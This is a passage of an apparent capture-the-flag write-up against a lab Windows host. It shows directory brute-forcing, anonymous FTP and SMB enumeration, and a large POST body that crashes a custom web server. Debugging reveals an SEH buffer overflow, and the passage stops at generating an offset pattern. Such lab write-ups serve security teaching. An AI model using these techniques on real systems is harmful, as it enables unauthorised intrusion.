200      GET       46l      151w     1478c http://10.129.234.59:8080/media-room
200      GET       46l      151w     1478c http://10.129.234.59:8080/melanie
200      GET       46l      151w     1478c http://10.129.234.59:8080/meirong
200      GET       46l      151w     1478c http://10.129.234.59:8080/member_files
200      GET       46l      151w     1478c http://10.129.234.59:8080/membersite
200      GET       46l      151w     1478c http://10.129.234.59:8080/mems
200      GET       46l      151w     1478c http://10.129.234.59:8080/mfa
200      GET       46l      151w     1478c http://10.129.234.59:8080/michel
200      GET       46l      151w     1478c http://10.129.234.59:8080/michele
200      GET       46l      151w     1478c http://10.129.234.59:8080/midland
200      GET       46l      151w     1478c http://10.129.234.59:8080/misc_management
200      GET       46l      151w     1478c http://10.129.234.59:8080/mojacarplaya
200      GET       46l      151w     1478c http://10.129.234.59:8080/mrm
200      GET       46l      151w     1478c http://10.129.234.59:8080/mrtg2
200      GET       46l      151w     1478c http://10.129.234.59:8080/murla
200      GET       46l      151w     1478c http://10.129.234.59:8080/mutxamel
200      GET       46l      151w     1478c http://10.129.234.59:8080/muzikl
200      GET       46l      151w     1478c http://10.129.234.59:8080/mwhois
200      GET       46l      151w     1478c http://10.129.234.59:8080/myads
200      GET       46l      151w     1478c http://10.129.234.59:8080/mynews
200      GET       46l      151w     1478c http://10.129.234.59:8080/myphpfiles
200      GET       46l      151w     1478c http://10.129.234.59:8080/mysql_backup
200      GET       46l      151w     1478c http://10.129.234.59:8080/mysearch
200      GET       46l      151w     1478c http://10.129.234.59:8080/napi
200      GET       46l      151w     1478c http://10.129.234.59:8080/narcotic
200      GET       46l      151w     1478c http://10.129.234.59:8080/naron
200      GET       46l      151w     1478c http://10.129.234.59:8080/odpowiedz
200      GET       46l      151w     1478c http://10.129.234.59:8080/nepal
200      GET       46l      151w     1478c http://10.129.234.59:8080/nep
200      GET       46l      151w     1478c http://10.129.234.59:8080/nepogoda
200      GET       46l      151w     1478c http://10.129.234.59:8080/newemail
200      GET       46l      151w     1478c http://10.129.234.59:8080/newslet
200      GET       46l      151w     1478c http://10.129.234.59:8080/newsletter-files
200      GET       46l      151w     1478c http://10.129.234.59:8080/newstyle
200      GET       46l      151w     1478c http://10.129.234.59:8080/night-life
200      GET       46l      151w     1478c http://10.129.234.59:8080/nifty
200      GET       46l      151w     1478c http://10.129.234.59:8080/nobel
200      GET       46l      151w     1478c http://10.129.234.59:8080/noticiesweb
200      GET       46l      151w     1478c http://10.129.234.59:8080/olddata
200      GET       46l      151w     1478c http://10.129.234.59:8080/olivanova
200      GET       46l      151w     1478c http://10.129.234.59:8080/ome
200      GET       46l      151w     1478c http://10.129.234.59:8080/onlinereg
200      GET       46l      151w     1478c http://10.129.234.59:8080/ontinyent
200      GET       46l      151w     1478c http://10.129.234.59:8080/ostatni
200      GET       46l      151w     1478c http://10.129.234.59:8080/padul
200      GET       46l      151w     1478c http://10.129.234.59:8080/pagetools
200      GET       46l      151w     1478c http://10.129.234.59:8080/participant
200      GET       46l      151w     1478c http://10.129.234.59:8080/pax
200      GET       46l      151w     1478c http://10.129.234.59:8080/paw
200      GET       46l      151w     1478c http://10.129.234.59:8080/pear_packages
200      GET       46l      151w     1478c http://10.129.234.59:8080/personales
200      GET       46l      151w     1478c http://10.129.234.59:8080/philg
200      GET       46l      151w     1478c http://10.129.234.59:8080/phaeton
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpMyAdmin-2
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpbanner
200      GET       46l      151w     1478c http://10.129.234.59:8080/pitanie
200      GET       46l      151w     1478c http://10.129.234.59:8080/pixlie
200      GET       46l      151w     1478c http://10.129.234.59:8080/play-bingo
200      GET       46l      151w     1478c http://10.129.234.59:8080/platnosci
200      GET       46l      151w     1478c http://10.129.234.59:8080/lewisandclark
200      GET       46l      151w     1478c http://10.129.234.59:8080/honeycards
200      GET       46l      151w     1478c http://10.129.234.59:8080/playadenbossa
200      GET       46l      151w     1478c http://10.129.234.59:8080/pnr
200      GET       46l      151w     1478c http://10.129.234.59:8080/postgraduate
200      GET       46l      151w     1478c http://10.129.234.59:8080/pozso
200      GET       46l      151w     1478c http://10.129.234.59:8080/pragma
200      GET       46l      151w     1478c http://10.129.234.59:8080/prepaidsim
200      GET       46l      151w     1478c http://10.129.234.59:8080/preparation
200      GET       46l      151w     1478c http://10.129.234.59:8080/prestations
200      GET       46l      151w     1478c http://10.129.234.59:8080/previsualiser
200      GET       46l      151w     1478c http://10.129.234.59:8080/previewx
200      GET       46l      151w     1478c http://10.129.234.59:8080/previo
200      GET       46l      151w     1478c http://10.129.234.59:8080/privates
200      GET       46l      151w     1478c http://10.129.234.59:8080/prizedraw
200      GET       46l      151w     1478c http://10.129.234.59:8080/privatus
200      GET       46l      151w     1478c http://10.129.234.59:8080/produitExterne
200      GET       46l      151w     1478c http://10.129.234.59:8080/public_includes
200      GET       46l      151w     1478c http://10.129.234.59:8080/pumps
200      GET       46l      151w     1478c http://10.129.234.59:8080/sunshine-coast
200      GET       46l      151w     1478c http://10.129.234.59:8080/quota
200      GET       46l      151w     1478c http://10.129.234.59:8080/rafolalmunia
200      GET       46l      151w     1478c http://10.129.234.59:8080/sitzungen
200      GET       46l      151w     1478c http://10.129.234.59:8080/readmore
200      GET       46l      151w     1478c http://10.129.234.59:8080/refg
200      GET       46l      151w     1478c http://10.129.234.59:8080/rico
200      GET       46l      151w     1478c http://10.129.234.59:8080/robes
200      GET       46l      151w     1478c http://10.129.234.59:8080/rosasmasfumats
200      GET       46l      151w     1478c http://10.129.234.59:8080/sanaugustin
200      GET       46l      151w     1478c http://10.129.234.59:8080/sanmiguelsalinas
200      GET       46l      151w     1478c http://10.129.234.59:8080/sanrafael
200      GET       46l      151w     1478c http://10.129.234.59:8080/santacristinaaro
200      GET       46l      151w     1478c http://10.129.234.59:8080/santaeulalia
200      GET       46l      151w     1478c http://10.129.234.59:8080/santceloni
200      GET       46l      151w     1478c http://10.129.234.59:8080/santomera
200      GET       46l      151w     1478c http://10.129.234.59:8080/schemi
200      GET       46l      151w     1478c http://10.129.234.59:8080/searchcache
200      GET       46l      151w     1478c http://10.129.234.59:8080/sfRating
200      GET       46l      151w     1478c http://10.129.234.59:8080/sh-bin
200      GET       46l      151w     1478c http://10.129.234.59:8080/shared_inc
200      GET       46l      151w     1478c http://10.129.234.59:8080/ship
200      GET       46l      151w     1478c http://10.129.234.59:8080/sherry
200      GET       46l      151w     1478c http://10.129.234.59:8080/shoppingBasket
200      GET       46l      151w     1478c http://10.129.234.59:8080/PageServer
200      GET       46l      151w     1478c http://10.129.234.59:8080/site52
200      GET       46l      151w     1478c http://10.129.234.59:8080/site58
200      GET       46l      151w     1478c http://10.129.234.59:8080/site73
200      GET       46l      151w     1478c http://10.129.234.59:8080/siz
200      GET       46l      151w     1478c http://10.129.234.59:8080/six
200      GET       46l      151w     1478c http://10.129.234.59:8080/skin_1
200      GET       46l      151w     1478c http://10.129.234.59:8080/skins_site
200      GET       46l      151w     1478c http://10.129.234.59:8080/skripts
200      GET       46l      151w     1478c http://10.129.234.59:8080/slanadmin
200      GET       46l      151w     1478c http://10.129.234.59:8080/snr_email
200      GET       46l      151w     1478c http://10.129.234.59:8080/sobmosdde
200      GET       46l      151w     1478c http://10.129.234.59:8080/social-network
200      GET       46l      151w     1478c http://10.129.234.59:8080/sogo
200      GET       46l      151w     1478c http://10.129.234.59:8080/sofia
200      GET       46l      151w     1478c http://10.129.234.59:8080/soi
200      GET       46l      151w     1478c http://10.129.234.59:8080/sortir
200      GET       46l      151w     1478c http://10.129.234.59:8080/srsverify
200      GET       46l      151w     1478c http://10.129.234.59:8080/stat1
200      GET       46l      151w     1478c http://10.129.234.59:8080/stat2
200      GET       46l      151w     1478c http://10.129.234.59:8080/static_images
200      GET       46l      151w     1478c http://10.129.234.59:8080/statistiky
200      GET       46l      151w     1478c http://10.129.234.59:8080/store_dev
200      GET       46l      151w     1478c http://10.129.234.59:8080/store3
200      GET       46l      151w     1478c http://10.129.234.59:8080/nvq-level-1-2-3
200      GET       46l      151w     1478c http://10.129.234.59:8080/suckers
200      GET       46l      151w     1478c http://10.129.234.59:8080/sujet
200      GET       46l      151w     1478c http://10.129.234.59:8080/surprise
200      GET       46l      151w     1478c http://10.129.234.59:8080/synchronize_db
200      GET       46l      151w     1478c http://10.129.234.59:8080/takeda
200      GET       46l      151w     1478c http://10.129.234.59:8080/talker
200      GET       46l      151w     1478c http://10.129.234.59:8080/tariffe
200      GET       46l      151w     1478c http://10.129.234.59:8080/tarifcard
200      GET       46l      151w     1478c http://10.129.234.59:8080/tavern
200      GET       46l      151w     1478c http://10.129.234.59:8080/templat
200      GET       46l      151w     1478c http://10.129.234.59:8080/tgv
200      GET       46l      151w     1478c http://10.129.234.59:8080/thumb_cache
200      GET       46l      151w     1478c http://10.129.234.59:8080/tienda2
200      GET       46l      151w     1478c http://10.129.234.59:8080/tictac
200      GET       46l      151w     1478c http://10.129.234.59:8080/tormos
200      GET       46l      151w     1478c http://10.129.234.59:8080/toredera
200      GET       46l      151w     1478c http://10.129.234.59:8080/tov
200      GET       46l      151w     1478c http://10.129.234.59:8080/tplates
200      GET       46l      151w     1478c http://10.129.234.59:8080/tovabb
200      GET       46l      151w     1478c http://10.129.234.59:8080/tplc
200      GET       46l      151w     1478c http://10.129.234.59:8080/tpe
200      GET       46l      151w     1478c http://10.129.234.59:8080/tqm
200      GET       46l      151w     1478c http://10.129.234.59:8080/transact
200      GET       46l      151w     1478c http://10.129.234.59:8080/travel-tips
200      GET       46l      151w     1478c http://10.129.234.59:8080/flightSearch
200      GET       46l      151w     1478c http://10.129.234.59:8080/trim
200      GET       46l      151w     1478c http://10.129.234.59:8080/trio
200      GET       46l      151w     1478c http://10.129.234.59:8080/tubePress
200      GET       46l      151w     1478c http://10.129.234.59:8080/tubeace-admin
200      GET       46l      151w     1478c http://10.129.234.59:8080/ttweb
200      GET       46l      151w     1478c http://10.129.234.59:8080/uefa
200      GET       46l      151w     1478c http://10.129.234.59:8080/usermanagement
200      GET       46l      151w     1478c http://10.129.234.59:8080/usermanage
200      GET       46l      151w     1478c http://10.129.234.59:8080/validar
200      GET       46l      151w     1478c http://10.129.234.59:8080/vb4test
200      GET       46l      151w     1478c http://10.129.234.59:8080/vb_old
200      GET       46l      151w     1478c http://10.129.234.59:8080/mwaextraedit5
200      GET       46l      151w     1478c http://10.129.234.59:8080/vbtube
200      GET       46l      151w     1478c http://10.129.234.59:8080/gebuehren
200      GET       46l      151w     1478c http://10.129.234.59:8080/escapadas
200      GET       46l      151w     1478c http://10.129.234.59:8080/enoturismo
200      GET       46l      151w     1478c http://10.129.234.59:8080/escapadas_prueba
200      GET       46l      151w     1478c http://10.129.234.59:8080/novios
200      GET       46l      151w     1478c http://10.129.234.59:8080/nieve
200      GET       46l      151w     1478c http://10.129.234.59:8080/nuevoparadores
200      GET       46l      151w     1478c http://10.129.234.59:8080/omc
200      GET       46l      151w     1478c http://10.129.234.59:8080/portaventura
200      GET       46l      151w     1478c http://10.129.234.59:8080/rutamaestrazgo
200      GET       46l      151w     1478c http://10.129.234.59:8080/rutadelaplata
200      GET       46l      151w     1478c http://10.129.234.59:8080/thalasso
200      GET       46l      151w     1478c http://10.129.234.59:8080/sevilla_sep
200      GET       46l      151w     1478c http://10.129.234.59:8080/srt
200      GET       46l      151w     1478c http://10.129.234.59:8080/video_player
200      GET       46l      151w     1478c http://10.129.234.59:8080/videobox
200      GET       46l      151w     1478c http://10.129.234.59:8080/podcasts-audio
200      GET       46l      151w     1478c http://10.129.234.59:8080/villamartin
200      GET       46l      151w     1478c http://10.129.234.59:8080/vimage
200      GET       46l      151w     1478c http://10.129.234.59:8080/vino
200      GET       46l      151w     1478c http://10.129.234.59:8080/vmware
200      GET       46l      151w     1478c http://10.129.234.59:8080/voiture-occasion
200      GET       46l      151w     1478c http://10.129.234.59:8080/voicemail
200      GET       46l      151w     1478c http://10.129.234.59:8080/vopros
200      GET       46l      151w     1478c http://10.129.234.59:8080/wEWBAK
200      GET       46l      151w     1478c http://10.129.234.59:8080/warning
200      GET       46l      151w     1478c http://10.129.234.59:8080/warszawa
200      GET       46l      151w     1478c http://10.129.234.59:8080/warrior
200      GET       46l      151w     1478c http://10.129.234.59:8080/waterbondage
200      GET       46l      151w     1478c http://10.129.234.59:8080/watch-online
200      GET       46l      151w     1478c http://10.129.234.59:8080/web_data
200      GET       46l      151w     1478c http://10.129.234.59:8080/web_design
200      GET       46l      151w     1478c http://10.129.234.59:8080/web_help
200      GET       46l      151w     1478c http://10.129.234.59:8080/wfl
200      GET       46l      151w     1478c http://10.129.234.59:8080/wgs
200      GET       46l      151w     1478c http://10.129.234.59:8080/wise
200      GET       46l      151w     1478c http://10.129.234.59:8080/worklife
200      GET       46l      151w     1478c http://10.129.234.59:8080/workout
200      GET       46l      151w     1478c http://10.129.234.59:8080/guzel-pro
200      GET       46l      151w     1478c http://10.129.234.59:8080/easy1
200      GET       46l      151w     1478c http://10.129.234.59:8080/wodspewm
200      GET       46l      151w     1478c http://10.129.234.59:8080/xf
200      GET       46l      151w     1478c http://10.129.234.59:8080/xml-api
200      GET       46l      151w     1478c http://10.129.234.59:8080/xtemplates
200      GET       46l      151w     1478c http://10.129.234.59:8080/xtend-DK-Poker
200      GET       46l      151w     1478c http://10.129.234.59:8080/yummy
200      GET       46l      151w     1478c http://10.129.234.59:8080/zadz
200      GET       46l      151w     1478c http://10.129.234.59:8080/zack
200      GET       46l      151w     1478c http://10.129.234.59:8080/zh_cn
200      GET       46l      151w     1478c http://10.129.234.59:8080/zg
200      GET       46l      151w     1478c http://10.129.234.59:8080/zing
200      GET       46l      151w     1478c http://10.129.234.59:8080/zurgena
200      GET       46l      151w     1478c http://10.129.234.59:8080/zuowen
200      GET       46l      151w     1478c http://10.129.234.59:8080/~chat
200      GET       46l      151w     1478c http://10.129.234.59:8080/~alex
200      GET       46l      151w     1478c http://10.129.234.59:8080/~blog
200      GET       46l      151w     1478c http://10.129.234.59:8080/1153
200      GET       46l      151w     1478c http://10.129.234.59:8080/1322
200      GET       46l      151w     1478c http://10.129.234.59:8080/1492
200      GET       46l      151w     1478c http://10.129.234.59:8080/1494
200      GET       46l      151w     1478c http://10.129.234.59:8080/1495
200      GET       46l      151w     1478c http://10.129.234.59:8080/1529
200      GET       46l      151w     1478c http://10.129.234.59:8080/1556
200      GET       46l      151w     1478c http://10.129.234.59:8080/1561
200      GET       46l      151w     1478c http://10.129.234.59:8080/2546
200      GET       46l      151w     1478c http://10.129.234.59:8080/420
200      GET       46l      151w     1478c http://10.129.234.59:8080/440
200      GET       46l      151w     1478c http://10.129.234.59:8080/513
200      GET       46l      151w     1478c http://10.129.234.59:8080/494
200      GET       46l      151w     1478c http://10.129.234.59:8080/5734
200      GET       46l      151w     1478c http://10.129.234.59:8080/584
200      GET       46l      151w     1478c http://10.129.234.59:8080/7508
200      GET       46l      151w     1478c http://10.129.234.59:8080/747
200      GET       46l      151w     1478c http://10.129.234.59:8080/756
200      GET       46l      151w     1478c http://10.129.234.59:8080/770
200      GET       46l      151w     1478c http://10.129.234.59:8080/944
200      GET       46l      151w     1478c http://10.129.234.59:8080/935
200      GET       46l      151w     1478c http://10.129.234.59:8080/ANY
200      GET       46l      151w     1478c http://10.129.234.59:8080/Account-Password
200      GET       46l      151w     1478c http://10.129.234.59:8080/SWNAV_ADMIN
200      GET       46l      151w     1478c http://10.129.234.59:8080/[0-9]
200      GET       46l      151w     1478c http://10.129.234.59:8080/ViewData-Start
200      GET       46l      151w     1478c http://10.129.234.59:8080/_shared_content
200      GET       46l      151w     1478c http://10.129.234.59:8080/adams
200      GET       46l      151w     1478c http://10.129.234.59:8080/broomfield
200      GET       46l      151w     1478c http://10.129.234.59:8080/columbia
200      GET       46l      151w     1478c http://10.129.234.59:8080/davis
200      GET       46l      151w     1478c http://10.129.234.59:8080/fairfield
200      GET       46l      151w     1478c http://10.129.234.59:8080/downloads_pdfs
200      GET       46l      151w     1478c http://10.129.234.59:8080/emirates
200      GET       46l      151w     1478c http://10.129.234.59:8080/iberia
200      GET       46l      151w     1478c http://10.129.234.59:8080/kenton
200      GET       46l      151w     1478c http://10.129.234.59:8080/other-tours
200      GET       46l      151w     1478c http://10.129.234.59:8080/outlet_store
200      GET       46l      151w     1478c http://10.129.234.59:8080/p111
200      GET       46l      151w     1478c http://10.129.234.59:8080/other-tour
200      GET       46l      151w     1478c http://10.129.234.59:8080/taos
[####################] - 2m     30000/30000   0s      found:1495    errors:2
[####################] - 2m     30000/30000   277/s   http://10.129.234.59:8080/ 

However, visiting any of these returns 404. If I run again with --burp, I’ll see that sometimes the request just returns the page root.

This seems like more of an issue with the server getting overloaded than any actual real content here.
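Every hit in this output shares one response signature (200, 46l, 151w, 1478c), which is what makes the result set noise. The following is an added example, not part of the original post: it groups feroxbuster result lines by signature and separates the dominant one from anything distinct. The last result line in the sample, the 0.8 dominance threshold, and the function names are assumptions made for the illustration.

```python
import re
from collections import Counter

# One feroxbuster result line: status, method, line/word/char counts, URL.
RESULT_RE = re.compile(
    r"^(?P<status>\d{3})\s+(?P<method>[A-Z]+)\s+(?P<lines>\d+)l\s+"
    r"(?P<words>\d+)w\s+(?P<chars>\d+)c\s+(?P<url>\S+)"
)

# The first six result lines and the progress bar are copied from the scan
# output above. The seventh result line is CONSTRUCTED to show what a response
# with a different signature would look like.
SAMPLE = """\
200      GET       46l      151w     1478c http://10.129.234.59:8080/dropoff
200      GET       46l      151w     1478c http://10.129.234.59:8080/drops
200      GET       46l      151w     1478c http://10.129.234.59:8080/encryption
200      GET       46l      151w     1478c http://10.129.234.59:8080/mysql_backup
200      GET       46l      151w     1478c http://10.129.234.59:8080/phpMyAdmin-2
200      GET       46l      151w     1478c http://10.129.234.59:8080/~chat
200      GET       12l       34w      410c http://10.129.234.59:8080/constructed-example
[####################] - 2m     30000/30000   0s      found:1495    errors:2
"""


def parse_results(text):
    """Return one dict per result line; progress bars and blanks are skipped."""
    rows = []
    for line in text.splitlines():
        match = RESULT_RE.match(line.strip())
        if not match:
            continue
        fields = match.groupdict()
        rows.append({
            "url": fields["url"],
            "method": fields["method"],
            # (status, lines, words, chars) identifies a response body shape.
            "signature": (
                int(fields["status"]),
                int(fields["lines"]),
                int(fields["words"]),
                int(fields["chars"]),
            ),
        })
    return rows


def triage(rows, baseline=None, dominance=0.8):
    """Split rows into (noise, distinct).

    A signature counts as noise when it equals `baseline` (for example the
    signature of the site root, measured separately) or when it accounts for
    at least `dominance` of all hits.
    """
    counts = Counter(row["signature"] for row in rows)
    noisy = set()
    if baseline is not None:
        noisy.add(baseline)
    if len(rows) > 1:
        signature, hits = counts.most_common(1)[0]
        if hits / len(rows) >= dominance:
            noisy.add(signature)
    noise = [row for row in rows if row["signature"] in noisy]
    distinct = [row for row in rows if row["signature"] not in noisy]
    return noise, distinct


if __name__ == "__main__":
    rows = parse_results(SAMPLE)
    noise, distinct = triage(rows)
    print(f"{len(rows)} hits, {len(noise)} share the dominant signature")
    for row in distinct:
        print("review:", row["signature"], row["url"])
```

A dominant signature at this volume points to a catch-all or overloaded server rather than real content; feroxbuster can also drop such responses during the scan with `--filter-size`.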

SMB - 445

I’ll try to authenticate with a guest account or junk account to see if there’s any anonymous SMB access, but I’m not able to get anything:

oxdf@hacky$ netexec smb 10.129.234.59 --shares
SMB         10.129.234.59   445    RAINBOW          [*] Windows 10 / Server 2019 Build 17763 x64 (name:RAINBOW) (domain:rainbow) (signing:False) (SMBv1:False)
SMB         10.129.234.59   445    RAINBOW          [-] Error enumerating shares: [Errno 32] Broken pipe
oxdf@hacky$ netexec smb 10.129.234.59 -u guest -p '' --shares
SMB         10.129.234.59   445    RAINBOW          [*] Windows 10 / Server 2019 Build 17763 x64 (name:RAINBOW) (domain:rainbow) (signing:False) (SMBv1:False)
SMB         10.129.234.59   445    RAINBOW          [-] rainbow\guest: STATUS_ACCOUNT_DISABLED 
oxdf@hacky$ netexec smb 10.129.234.59 -u oxdf -p oxdf --shares
SMB         10.129.234.59   445    RAINBOW          [*] Windows 10 / Server 2019 Build 17763 x64 (name:RAINBOW) (domain:rainbow) (signing:False) (SMBv1:False)
SMB         10.129.234.59   445    RAINBOW          [-] rainbow\oxdf:oxdf STATUS_LOGON_FAILURE 

Nothing here without auth.

FTP - 21

I’m able to connect to FTP using the anonymous account with no password:

oxdf@hacky$ ftp anonymous@10.129.234.59
Connected to 10.129.234.59.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50101|)
150 Opening ASCII mode data connection.
01-18-22  08:22AM                  258 dev.txt
01-18-22  08:30AM                54784 rainbow.exe
01-16-22  01:34PM                  479 restart.ps1
01-16-22  12:14PM       <DIR>          wwwroot
ftp> ls wwwroot
229 Entering Extended Passive Mode (|||50109|)
125 Data connection already open; Transfer starting.
01-16-22  11:48AM                 1523 index.html
226 Transfer complete.

There are four files. I’ll get them all (remembering to switch to binary mode first, or the executable will be really corrupted).

dev.txt is a note:

  • Our webserver has been crashing a lot lately. Instead of touching the code we added a restart script!
  • The server will dynamically pick a port when its default port is unresponsive (8080-8090).
  • We’ll fix this later by adding load balancer.

  • dev team

restart.ps1 is that script:

Set-Location -Path c:\rainbow
for(;;){
try{
If (!(Get-Process -Name rainbow -ErrorAction SilentlyContinue))
{Invoke-Expression "C:\rainbow\rainbow.exe" }
$proc = Get-Process -Name rainbow | Sort-Object -Property ProcessName -Unique -ErrorAction SilentlyContinue
If (!$proc -or ($proc.Responding -eq $false) or ($proc.WorkingSet -GT 200000*1024)) {
$proc.Kill()
Start-Sleep -s 10
Invoke-Expression "C:\rainbow\rainbow.exe"}
}
catch    {    }
Start-sleep -s 30
}

It finds the process, and if it doesn’t exist, isn’t responding, or it’s memory has gotten too big (2GB), it kills the process, sleeps 10 seconds, and then starts the exe again.

rainbow.exe is presumably the webserver, and it’s a 32-bit Windows executable:

oxdf@hacky$ file rainbow.exe 
rainbow.exe: PE32 executable (console) Intel 80386, for MS Windows, 4 sections

index.html is the HTML for the port 8080 index page.

Shell as rainbow

Crashing Rainbow

Strategy

My first thought is that since the script is in place to restart rainbow.exe whenever it crashes, I will overwrite rainbow.exe with FTP and then crash it. When it restarts, it’ll run my binary and I’ll have a shell. I did open the binary in Ghidra and made some progress on understanding the basic flow, but decided to look for a crash in obvious places first, and come back if necessary.

Identify Crash

For that to work, I’ll need to crash the server.

I can get deep into fuzzing, but to start I’ll generate a giant payload and try sending it in different places with curl.

oxdf@hacky$ HUGE=$(python -c 'print("A"*1000)')

I can try sending it as the User-Agent header:

oxdf@hacky$ curl http://10.129.234.59:8080 -H "User-Agent: $HUGE"
<!DOCTYPE html>
...[snip]...

Or in the URL:

oxdf@hacky$ curl http://10.129.234.59:8080/$HUGE
<html><h1>404 Not Found</h1></html>

Both handle it nicely. What about POST body:

oxdf@hacky$ curl http://10.129.234.59:8080 -d "$HUGE"
curl: (56) Recv failure: Connection reset by peer

That looks like a crash. A 500-character body doesn’t crash it, 800 does, and 600 and 650 just hang. There’s definitely something going on here.

Overwrite

Unfortunately for me, I’m not able to overwrite the binary over FTP:

ftp> binary
200 Type set to I.
ftp> put rev.exe rainbow.exe
local: rev.exe remote: rainbow.exe
229 Entering Extended Passive Mode (|||50115|)
550 Access is denied. 

So that’s a bit of a dead end for that idea.

Exploit

Debug Crash

Still, a crash is typically an opportunity to get code execution if I can control the input that overflows the buffer (which I should be able to). I’ll open a Windows VM and run rainbow.exe in x32dbg. I’ll disable the starting breakpoints (Options –> Preferences –> Events and uncheck everything). On running, a window pops up:

Starting Rainbow Server...!

I’ll send a request and it returns 404:

oxdf@hacky$ curl http://10.0.0.202:8080
<html><h1>404 Not Found</h1></html>

The rainbow.exe window shows the request:

[Debug] GET /

I didn’t load wwwroot/index.html into the same directory as rainbow.exe. If I create that, it comes back:

oxdf@hacky$ curl http://10.0.0.202:8080
<h1>Hello, 0xdf</h1>

I’ll send a large payload now:

oxdf@hacky$ curl http://10.0.0.202:8080 -d $HUGE

It hangs. At rainbow.exe:

[Debug] POST-Data AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA╨HìnAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

In x32dbg, there’s a crash at the bottom:

image-20250731172016135

EIP is not overwritten:

image-20250731172040838

But on the SEH tab:

image-20250731172124220

I’ve overwritten both the next handler as well as the pointer to the handler itself.

Calculate Offset

I’ll use a pattern tool (in this case Peda in gdb) to get a pattern:

oxdf@hacky$ gdb
...[snip]...
gdb-peda$ pattern_create 1000
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'

I’ll send that as the curl POST payload:

